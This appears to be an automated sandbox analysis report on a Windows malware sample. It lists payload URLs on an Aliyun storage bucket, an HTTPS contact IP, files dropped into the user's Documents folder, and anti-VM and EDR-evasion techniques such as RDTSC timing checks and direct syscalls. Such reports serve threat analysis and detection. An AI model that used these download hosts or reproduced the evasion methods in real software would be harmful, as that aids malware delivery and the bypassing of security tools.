Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/-2246122658-3693405117-2476756634-1003R
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/-2476756634-1003
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/-2476756634-1003?
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/K
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/W
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gif
Source: 1387457-38765948.15.exe, 00000000.00000002.3287821784.000000000014C000.00000004.00000010.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000637000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifhttps://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifht
Source: 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000609000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifnghai.aliyuncs.com/a.gif
Source: 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifom
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifs
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifv
Source: 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000609000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gif
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifW
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifcm.ali
Source: 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.giff
Source: 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.giff7
Source: 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.giffS
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifnet-cn
Source: 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000609000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifta
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287821784.000000000014C000.00000004.00000010.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000637000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gif
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gif;6?
Source: 1387457-38765948.15.exe, 00000000.00000002.3287821784.0000000000140000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifIQ
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifY
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifcn-sha
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.giff7
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.giffO
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifom
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifshangh
Source: 1387457-38765948.15.exe, 00000000.00000002.3287821784.000000000014C000.00000004.00000010.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000637000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gif
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/hanghai.aliyuncs.com/
Source: 1387457-38765948.15.exe, 00000000.00000002.3287821784.0000000000140000.00000004.00000010.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000609000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/i.dat
Source: 1387457-38765948.15.exe, 00000000.00000002.3287821784.0000000000140000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/i.datC:
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/i.dats
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/o
Source: 1387457-38765948.15.exeString found in binary or memory: https://www.globalsign.com/repository/0
Source: 1387457-38765948.15.exeString found in binary or memory: https://yandex.com0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownHTTPS traffic detected: 47.101.26.25:443 -> 192.168.2.5:49981 version: TLS 1.2
Source: C:\Users\user\Desktop\1387457-38765948.15.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_000000014000A9140_2_000000014000A914
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_00000001400045800_2_0000000140004580
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_00000001400092480_2_0000000140009248
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_000000014000F6B80_2_000000014000F6B8
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_005B24450_2_005B2445
Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\c4wtKa.exe D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
Source: 1387457-38765948.15.exeStatic PE information: invalid certificate
Source: 1387457-38765948.15.exeBinary or memory string: OriginalFilename vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000000.2045995039.0000000141D76000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameps64ldr.exe> vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSa.dllp( vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000002.3289281235.0000000005CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameps64ldr.exe> vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exeBinary or memory string: OriginalFilenameps64ldr.exe> vs 1387457-38765948.15.exe
Source: classification engineClassification label: mal72.evad.winEXE@1/5@1/1
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_00000001400043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,GetCurrentProcessId,Process32NextW,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CreateToolhelp32Snapshot,Thread32First,CloseHandle,PostThreadMessageW,Thread32Next,CloseHandle,0_2_00000001400043D0
Source: C:\Users\user\Desktop\1387457-38765948.15.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\i[1].datJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: 1387457-38765948.15.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\1387457-38765948.15.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 1387457-38765948.15.exeVirustotal: Detection: 8%
Source: C:\Users\user\Desktop\1387457-38765948.15.exeFile read: C:\Users\user\Desktop\1387457-38765948.15.exeJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: hid.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: 1387457-38765948.15.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 1387457-38765948.15.exeStatic file information: File size 30954656 > 1048576
Source: 1387457-38765948.15.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58200
Source: 1387457-38765948.15.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 1387457-38765948.15.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 1387457-38765948.15.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 1387457-38765948.15.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 1387457-38765948.15.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 1387457-38765948.15.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 1387457-38765948.15.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\BuildAgent\work\897482836e9bb448\_bin\Release\ps64ldr.pdb source: 1387457-38765948.15.exe
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.dr
Source: 1387457-38765948.15.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 1387457-38765948.15.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 1387457-38765948.15.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 1387457-38765948.15.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 1387457-38765948.15.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_0000000140004150 StrCpyW,PathAppendW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,FreeLibrary,0_2_0000000140004150
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_001F36AA pushad ; iretd 0_2_001F36B3
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_001F1AEE push ss; iretd 0_2_001F1AEF
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_001F4B0E push ss; iretd 0_2_001F4B0F
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_001F43DB push 0000001Bh; iretd 0_2_001F43DD
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_005B4D48 push eax; retf 0_2_005B4D49

Persistence and Installation Behavior

barindex
Drops PE files to the document folder of the user
Source: C:\Users\user\Desktop\1387457-38765948.15.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\1387457-38765948.15.exeFile created: C:\Users\user\Documents\c4wtKa.exeJump to dropped file
Source: C:\Users\user\Desktop\1387457-38765948.15.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\1387457-38765948.15.exeFile created: C:\Users\user\Documents\c4wtKa.exeJump to dropped file

Malware Analysis System Evasion

barindex
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_00000001400010FC 0_2_00000001400010FC
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\1387457-38765948.15.exeRDTSC instruction interceptor: First address: 14000111B second address: 140001132 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1387457-38765948.15.exeRDTSC instruction interceptor: First address: 140001132 second address: 140001132 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007FBF08D66110h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_00000001400010FC rdtsc 0_2_00000001400010FC
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_00000001400043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,GetCurrentProcessId,Process32NextW,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CreateToolhelp32Snapshot,Thread32First,CloseHandle,PostThreadMessageW,Thread32Next,CloseHandle,0_2_00000001400043D0
Source: C:\Users\user\Desktop\1387457-38765948.15.exeWindow / User API: threadDelayed 694Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeDropped PE file which has not been started: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\1387457-38765948.15.exeDropped PE file which has not been started: C:\Users\user\Documents\c4wtKa.exeJump to dropped file
Source: C:\Users\user\Desktop\1387457-38765948.15.exeAPI coverage: 4.3 %
Source: C:\Users\user\Desktop\1387457-38765948.15.exe TID: 2656Thread sleep count: 694 > 30Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe TID: 2656Thread sleep time: -347000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe TID: 2656Thread sleep count: 305 > 30Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe TID: 2656Thread sleep time: -152500s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_0000000140004094 GetModuleFileNameW,StrCpyW,PathAppendW,StrCatW,FindFirstFileW,0_2_0000000140004094
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_00000001400042D0 StrCpyW,PathAppendW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,FreeLibrary,StrCpyW,FindNextFileW,FindClose,FindFirstFileW,StrCmpIW,StrCpyW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,StrCpyW,StrCpyW,PathAppendW,0_2_00000001400042D0
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_000000014000AB44 FindFirstFileExW,0_2_000000014000AB44
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_005AD895 GetSystemInfo,0_2_005AD895
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000624000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000624000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\1387457-38765948.15.exeAPI call chain: ExitProcess graph end nodegraph_0-8362
Source: C:\Users\user\Desktop\1387457-38765948.15.exeAPI call chain: ExitProcess graph end nodegraph_0-8365
Source: C:\Users\user\Desktop\1387457-38765948.15.exeAPI call chain: ExitProcess graph end nodegraph_0-8367
Source: C:\Users\user\Desktop\1387457-38765948.15.exeAPI call chain: ExitProcess graph end nodegraph_0-8371
Source: C:\Users\user\Desktop\1387457-38765948.15.exeAPI call chain: ExitProcess graph end nodegraph_0-8356
Source: C:\Users\user\Desktop\1387457-38765948.15.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_00000001400010FC rdtsc 0_2_00000001400010FC
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_0000000140008218 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0000000140008218
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_00000001400046C8 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00000001400046C8
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_00000001400043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,GetCurrentProcessId,Process32NextW,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CreateToolhelp32Snapshot,Thread32First,CloseHandle,PostThreadMessageW,Thread32Next,CloseHandle,0_2_00000001400043D0
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_0000000140004150 StrCpyW,PathAppendW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,FreeLibrary,0_2_0000000140004150
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_0000000140004150 StrCpyW,PathAppendW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,FreeLibrary,0_2_0000000140004150
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_000000014000FC50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_000000014000FC50
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_000000014000510C SetUnhandledExceptionFilter,0_2_000000014000510C
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_0000000140008218 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0000000140008218
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_0000000140004F24 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0000000140004F24

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
